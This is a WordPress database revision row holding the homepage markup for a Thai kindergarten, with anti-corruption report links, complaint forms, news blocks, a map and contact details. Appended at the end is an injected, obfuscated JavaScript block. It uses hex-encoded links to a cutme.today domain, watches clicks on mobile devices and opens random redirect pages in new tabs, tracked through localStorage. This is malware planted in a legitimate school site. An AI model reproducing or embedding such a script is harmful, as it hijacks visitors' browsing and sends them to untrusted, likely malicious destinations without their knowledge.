{\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2025-07-15 15:53:18','2025-07-15 08:53:18','',19,'http://watprato.ssk.in.th/?p=700',0,'revision','',0),
